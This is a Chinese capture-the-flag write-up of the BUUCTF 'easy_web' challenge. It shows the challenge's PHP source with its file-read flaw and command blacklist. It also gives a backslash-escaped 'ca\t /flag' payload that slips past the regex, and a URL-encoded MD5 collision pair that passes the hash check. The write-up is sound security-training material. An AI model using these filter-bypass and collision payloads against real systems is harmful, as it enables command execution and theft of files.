观察源代码和get所传参数可猜测img所传参数img就是该图片 经过两次base64编码和一次hex编码后可得555.png成果验证猜测
然后发现该图片以data元数据封装的方式放到了源码里 猜测可以通过此漏过获得index.php的源码
于是将img处参数设为经过两次base64编码和一次hex编码后的index.php 成功获得index.php源代码
error_reporting(E_ALL || ~ E_NOTICE);header('content-type:text/html;charset=utf-8');$cmd = $_GET['cmd'];if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');$file = hex2bin(base64_decode(base64_decode($_GET['img'])));$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);if (preg_match("/flag/i", $file)) { echo ''; die("xixi~ no flag");} else { $txt = base64_encode(file_get_contents($file)); echo ""; echo "";}echo $cmd;echo "";if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~"); echo "";} else { if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); }}?><html><style> body{ background:url(./bj.png) no-repeat center center; background-size:cover; background-attachment:fixed; background-color:#CCCCCC;}</style><body></body></html>
通过分析源代码可知不能通过img处获得flag 然而我们发现cmd命令是通过黑名单验证以及要经过一次md5的校验(常见套路) md5 通过百度查询md5强碰撞的例子即可得到 然而cmd参数处的命令执行绕过是通过反斜杠逃逸实现的 即ca\t /flag,原理下文剖析 于是该题的payload
ca\t /flag
参考博客:https://www.jianshu.com/p/c9089fd5b1ba
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
这个题就卡在这个点上了 这个原理是因为 当在前端输入ca\t时 后端将此字符存为字符串&#8221;ca\\t&#8221; 而&#8221;ca\\t&#8221;需要用“\\\\t”来匹配 从而绕过正则 而且在shell命令里可以随便加\不影响执行 而
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1e618/bdf/129913486c37ddf6.jpeg)
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1eebe/cd5/e88efe5b0a13a7fa.webp)
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1eebe/cd5/e3aa5425383ba10d.png)
'![](data:image/gif;base64,"</span> <span>.</span> <span>$txt</span> <span>.</span> <span>")
"![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1eebe/cd5/4283cd4bbba41b87.png)
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1eebe/cd5/6c257b6ba227cc3e.webp)
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1eebe/cd5/a5d7215df572c386.webp)
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/189d8/b64/5b34b53b79a39fdd.jpeg)
![《buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web》](https://img.php1.cn/3cd4a/1eebe/cd5/6789f68dabde0aed.png)
京公网安备 11010802041100号